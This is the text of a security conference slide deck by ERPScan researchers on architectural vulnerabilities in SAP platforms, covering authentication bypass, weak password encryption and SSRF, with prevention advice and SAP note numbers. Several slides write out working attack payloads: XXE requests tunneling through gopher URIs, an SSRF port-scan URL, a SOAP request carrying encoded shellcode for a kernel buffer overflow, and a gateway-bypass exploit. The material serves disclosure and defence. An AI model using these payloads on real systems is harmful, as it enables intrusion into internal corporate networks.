![Page 1: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/1.jpg)
Invest in security to secure investments
Architecture vulnerabili/es in SAP pla4orms: History and future trends.
Alexander Polyakov, CTO, ERPScan Dmitry Evdokimov, Principal Researcher, ERPScan
1
![Page 2: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/2.jpg)
About ERPScan
• The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta/ons key security conferences worldwide • 25 Awards and nomina/ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
![Page 3: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/3.jpg)
SAP
• The most popular business applica8on • More than 185000 customers • 74% of Forbes 500
3
![Page 4: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/4.jpg)
Agenda
• Intro – The history of SAP security – Trends – Common SAP issues
• Architecture problems and uncommon issues • Advice for developers and future trends • Conclusion
4
![Page 5: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/5.jpg)
5
3 areas of SAP Security
2010 Applica3on pla4orm security
Prevents unauthorized access both insiders and remote a3ackers
Solu8on: Vulnerability Assessment and Monitoring
2008
ABAP Code security Prevents a3acks or mistakes made by developers Solu8on: Code audit
2002
Business logic security (SOD) Prevents a3acks or mistakes made Solu8on: GRC
![Page 6: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/6.jpg)
Talks about SAP security
0
5
10
15
20
25
30
35
2006 2007 2008 2009 2010 2011 2012
Most popular: • BlackHat • HITB • Troopers • RSA • Source • DeepSec • etc.
6
![Page 7: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/7.jpg)
SAP Security notes
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
By October 2012, more than 2500 notes
7
![Page 8: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/8.jpg)
Business Risks
Espionage • Stealing financial informa8on • Stealing corporate secrets • Stealing suppliers and customers list • Stealing HR data Sabotage • Denial of service • Modifica8on of financial reports • Access to technology network (SCADA) by trust rela8ons Fraud • False transac8ons • Modifica8on of master data • Etc.
8
![Page 9: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/9.jpg)
SAP vulnerabili/es by type
0 50 100 150 200 250 300 350
12 -‐SQL Inj
11 -‐ BOF
10 -‐ Denial of service
9 -‐ Remote Code Execu8on
8 -‐ Verb tampering
7 -‐ Code injec8on vulnerability
6 -‐ Hard-‐coded creden8als
5 -‐ Unauthorized usage of applica8on
4 -‐ Informa8on Disclosure
3 -‐ Missing Auth check
2 -‐ XSS/Unauthorised modifica8on of
1 -‐ Directory Traversal
Stats from : • 1Q 2012 • 1Q 2010 • 4Q 2009
But what about the other 20%?
9
![Page 10: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/10.jpg)
Architecture and unusual issues
Authen/ca/on Bypass 1. Verb tampering 2. Invoker servlet Encryp/on 3. Storage – SAPGUI 4. Authen8ca8on – P4 5. Transfer – RFC, Diag SSRF 6. Port Scan 7. Command execu8on 8. Security bypass
10
![Page 11: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/11.jpg)
Authen/ca/on
11
![Page 12: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/12.jpg)
ex1. Invoker Servlet: Descrip/on
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from an applica8on
• Even if it is not declared in WEB.XML
Can be used for authen/ca/on bypass
12
![Page 13: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/13.jpg)
ex1. Invoker Servlet: Details
<servlet> <servlet-‐name>Cri8calAc8on</servlet-‐name> <servlet-‐class>com.sap.admin.Cri8cal.Ac8on</servlet-‐class> </servlet> <servlet-‐mapping> <servlet-‐name>Cri8calAc8on</</servlet-‐name> <url-‐paiern>/admin/cri8cal</url-‐paiern> </servlet-‐mapping <security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paiern>/admin/*</url-‐paiern> <hip-‐method>GET</hip-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>admin</role-‐name> </auth-‐constraint> </security-‐constraint>
What if we call /servlet/com.sap.admin.Cri/cal.Ac/on
13
![Page 14: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/14.jpg)
ex1. Invoker servlet: Preven/on
For users: • Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files
- with free ERPScan WEBXML checker - manually
For developers: • Follow “Security by default” prac8ce
14
![Page 15: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/15.jpg)
2. VERB Tampering
15
![Page 16: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/16.jpg)
ex2. Verb Tampering
<security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paiern>/admin/*</url-‐paiern> <hip-‐method>GET</hip-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>admin</role-‐name> </auth-‐constraint> </security-‐constraint>
What if we use HEAD instead of GET ?
16
![Page 17: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/17.jpg)
ex2. Verb tampering: Details
• CTC: an interface for managing J2EE engine • Can be accessed remotely • Can run user management ac8ons:
– Add users – Add to groups – Run OS commands – Start/Stop J2EE
Over 40 other components found to be vulnerable
17
![Page 18: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/18.jpg)
ex2. Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
18
![Page 19: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/19.jpg)
ex2. Verb tampering: Preven/on
For Users: • Install SAP notes 1503579, 1616259 • Install other SAP notes about Verb Tampering • Disable Invoker Servlet • Disable the applica8ons that are not necessary • Check all WEB.XML files
- with free ERPScan WEBXML checker - manually
For Developers: • The issue was known in 2008 and patched in many applica8on servers.
Learn from others’ mistakes.
19
![Page 20: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/20.jpg)
Encryp/on
20
![Page 21: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/21.jpg)
Where it can be used
While authen8ca8ng (example 5)
While transmiqng (example 4)
While storing (example 3)
21
![Page 22: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/22.jpg)
ex3. SAP GUI encryp/on
• SAP FrontEnd can save encrypted passwords in shortcuts • Shortcuts stored in .sap file • This password uses byte-‐XOR algorithm with “secret” key • The key has the same value for every installa8on of SAP GUI • Any password can be decrypted
22
![Page 23: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/23.jpg)
For Users • Disable password storage in GUI For Developers: • Use at least random salt depending on the installa8on • Do not use XOR in the future
ex3. SAP GUI encryp/on: Preven/on
23
![Page 24: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/24.jpg)
ex4. Insecure password encryp/on in P4
But the password is encrypted
By default, data transmiied in cleartext
P4: a protocol used by the Visual Admin app
24
![Page 25: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/25.jpg)
ex4. Insecure password encryp/on in P4
25
![Page 26: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/26.jpg)
ex4. Insecure password encryp/on in P4
/* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;
26
![Page 27: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/27.jpg)
ex4. Insecure password encryp/on in P4: Preven/on
For Users: • Use SSL to secure all the data transmiied between server-‐server and server-‐client connec8ons hip://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm
For Developers: • Use known and approved authen8ca8on schemes such as cram md5 (at least, if it is broken, you will not be the one)
27
![Page 28: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/28.jpg)
ex5. Password transmibng (DIAG/RFC)
DIAG – not an encryp8on protocol; also broken
RFC encryp8on – broken in 2007 (XOR)
Were already covered many 8mes
28
![Page 29: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/29.jpg)
ex5. Password transmibng (DIAG/RFC)
For Users: • Use SNC For Developers: • XOR is BAD
29
![Page 30: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/30.jpg)
SSRF
30
![Page 31: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/31.jpg)
SSRF Basics
• We send Packet A to Service A • Service A ini8ates Packet B to service B • The services can be on the same host or on different hosts • We can manipulate some fields of packet B within packet A • Various SSRF aiacks depend on how many fields we can
control on packet B
Packet A
Packet B
31
![Page 32: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/32.jpg)
SSRF at a glance
Secure network
Corporate network
Packet B
• We send Packet A to Service A
• Service A ini8ates Packet B to service B
• The services can be on the same host or on different hosts
• We can manipulate some fields of packet B within packet A
• Various SSRF aiacks depend on how many fields we can control in packet B
32
![Page 33: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/33.jpg)
What can be done by SSRF?
Security bypass (example 8)
Code execu8on (example 7)
Port scanning (example 6)
Let’s look deeper
33
![Page 34: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/34.jpg)
ex6. Remote port scan by SSRF
• It is possible to scan internal network from the Internet • Authen8ca8on is not required • SAP NetWeaver J2EE engine’s ipcpricing is vulnerable
o And at least 3 similar vulnerabili8es in other services
• /ipcpricing/ui/BufferOverview.jsp? • server=172.16.0.13 • & port=31337 • & password= • & dispatcher= • & targetClient= • & view=
34
![Page 35: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/35.jpg)
ex6. Remote port scan with SSRF: Demo
Port closed
HTTP port
SAP port
35
![Page 36: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/36.jpg)
ex7. Code execu/on with SSRF
• DilbertMSG web service • Use Soap XML • For tes8ng purposes • Shipped with SAP PI < 7.1 by default • Accessed without authoriza8on • Patched in SAP Security note 1707494
36
![Page 37: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/37.jpg)
ex7. XXE tunneling Gopher URI scheme
What will happen??
<?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/
AAAAAAAAA" >]> <foo>&date;</foo>
37
![Page 38: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/38.jpg)
ex7. XXE Tunneling details
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 192.168.0.1:8000 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>
AAAAAAAAA
Port 3300
telnet 172.16.0.1 3300
38
![Page 39: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/39.jpg)
ex7. XXE Tunneling to Buffer Overflow
• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in SAP note 1487330)
• An example of any other vulnerability could be here • Hard to exploit because it requires calling an RFC func8on which
calls Kernel func8on • But even such a complex aiack can be exploited by SSRF
39
![Page 40: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/40.jpg)
ex7. XXE Tunneling to Buffer Overflow (Step 1)
• We exploit it via WEBRFC • Can be fixed by SAP notes: 1394100, 1536640, 1528822,
1453457 • According to our report, WEBRFC is installed in 40% of
NetWeaver ABAP, even on the Internet
40
![Page 41: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/41.jpg)
ex7. XXE Tunneling to Buffer Overflow (Step 2)
• Shellcode size is limited to 255 bytes (name parameter) • As we don’t have direct connec8on to the Internet from the
vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory • So we can use egghunter • Any shellcode can be uploaded
41
![Page 42: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/42.jpg)
ex7. XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-‐client=000 HTTP/1.1 Authoriza8on: Basic U1FQKjowMjA3NTk3== Host: company.com:80 User-‐Agent: ERPSCAN Pentes8ng tool v 0.2 Content-‐Type: text/xml; charset=u�-‐8 Cookie: sap-‐client=000 Content-‐Length: 2271 <SOAP-‐ENV:Envelope xmlns:SOAP-‐ENV="hip://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-‐ENC="hip://schemas.xmlsoap.org/soap/
encoding/" xmlns:xsi="hip://www.w3.org/2001/XMLSchema-‐instance" xmlns:xsd="hip://www.w3.org/2001/XMLSchema"><SOAP-‐ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-‐com:document:sap:rfc:func8ons"><HEAP_EGG>dsecdsechff�4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</HEAP_EGG><NAME>ºÿÿÎ<fÊÿBRjCXÍ.<Ztï¸dsec‹ú¯uê¯uçÿ琐AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAž¾«DSEC^ü1+ÔSò�:G�ú/9LÿT���â_�@���a}Xs§quڝ�€E�RYëë†Æ�ÿÿéMÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-‐ENV:Body></SOAP-‐ENV:Envelope>
42
![Page 43: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/43.jpg)
ex7. XXE Tunneling to Buffer Overflow (Step 3)
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 Content-‐Length: 7730 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[Urlencoded Packet B]" >]> <foo>&date;</foo>
Packet A
• Next step is to pack this packet B into Packet A • We need to insert non-‐printable symbols • God bless gopher; it supports urlencode like HTTP • It will also help us evade aiack against IDS systems
43
![Page 44: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/44.jpg)
ex10. XXE Tunneling to Buffer Overflow: Final step
Server B in DMZ (SAP ERP)
Server A on the Internet (SAP XI)
hip://company.com
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[packetB]" >]> <foo>&date;</foo>
Port 8000 WebRFC service
Packet B
Shellcode service with DNS payload
Packet C – Command and Control response to avacker by DNS protocol which is allowed for outband connec/ons
44
![Page 45: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/45.jpg)
Full control over the internal system through the Internet
45
![Page 46: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/46.jpg)
ex8. SSRF to Security bypass: SAP Gateway
• SAP Gateway: remote management of SAP • Different aiacks are possible like registering fake RFC service • Currently, secured by the gw/monitor op8on:
0: No monitor commands are accepted 1: Only monitor commands from the local gateway monitor are accepted 2: Monitor commands from local and remote monitors are accepted
• With XXE Tunneling, we can act like a local monitor bypassing restric8ons
• For example, we can change SAP Gateway parameters
46
![Page 47: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/47.jpg)
SAP Gateway server security bypass: Exploit
Message Server vulnerable as well
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 172.16.10.63:8001 Content-‐Length: 621 <?xml version="1.0" encoding="UTF-‐8"?><!DOCTYPE in [<!ENTITY li SYSTEM
"gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE">]><dmsg:generate xmlns:dmsg='hip://sap.com/fun/dilbert/msg' 8tle='&li;'>1</dmsg:generate>
47
![Page 48: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/48.jpg)
SSRF: Preven/on
For Users: • Disable unnecessary applica8ons (such as XML interfaces) • Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883 • Don’t rely on firewalls only For Developers: • Take care not only about input data but also about output data • Filters must be in every place where it is possible to call remote systems • Don’t trust localhost
48
![Page 49: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/49.jpg)
Advice for SAP
49
![Page 50: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/50.jpg)
Some other cases
New technologies = new risks (for Developers)
Double patches (for Remedia8on Team)
Unusual places for known vulnerabili8es (for QA)
50
![Page 51: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/51.jpg)
Unusual XSS in BAPI (for QA)
• SAP BAPI transac8on fails to sani8ze input properly • Possible to inject JavaScript code • No cookies, but we can make a link to a fake SMB server • SAP GUI clients usually use Windows • Windows creden8als will be transferred to aiacker’s host
51
![Page 52: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/52.jpg)
Unusual XSS in BAPI
52
![Page 53: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/53.jpg)
Unusual XSS in BAPI: Preven/on
For Users • Apply patches 1569550 For Developers: • XSS is not only about cookie stealing • In SAP, well-‐known old things can appear in an unusual way
53
![Page 54: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/54.jpg)
Double patches (for Remedia/on)
There were some patches that failed to solve the problem in full
• TH_GREP – patched on Linux but not on Windows – It doesn’t maier if it is more or less possible to exploit – Patch it carefully
• Portal Directory traversal – Directory traversal is not about filtering ../ – The idea is that UNAUTHORIZED ACCESS should be prevented
• Mul/ple XSS in one script – Some8mes, there are patches for one parameter but not for the others – A very bad situa8on when informa8on about patched parameter goes
public
54
![Page 55: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/55.jpg)
New technologies = new risks (For Developers)
• SAP is buying many systems – Their security tes8ng processes may be different or there can be no
processes
• SAP is inves8ng in new technologies and areas – Cloud – Mobile – In-‐Memory
• There can be new security issues in those areas, not known before.
55
![Page 56: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/56.jpg)
Conclusion
It is possible to protect yourself from these kinds of issues and we are working close with SAP to keep the customers secure
SAP Guides
It’s all in your hands
Regular security assessments
ABAP Code review
Monitoring technical security
Segrega/on of Du/es
56
![Page 57: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/57.jpg)
Future work
Many of the researched issues cannot be disclosed now because of our good rela8onship with SAP Security Response Team, whom I would like to thank for coopera8on. However, if you want to be
the first who will see new aiacks and demos, follow us at @erpscan and aiend future presenta8ons:
• 2–3 November – HashDays (Switzerland, Lucerne) • 9 November – POC (Korea, Seul) • 20 November – ZeroNights (Russia, Moscow) • 29 November – DeepSEC (Austria, Vienna)
57
![Page 58: Architecture vulnerabilities in SAP platforms](https://reader033.vdocument.in/reader033/viewer/2022042820/55cfc747bb61ebba6f8b4579/html5/thumbnails/58.jpg)
Thanks to all our crew who helped in this research: Dmitry Chastukhin, Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeny Neyolov, Nikolay Mescherin, Alexander Minozhenko.
58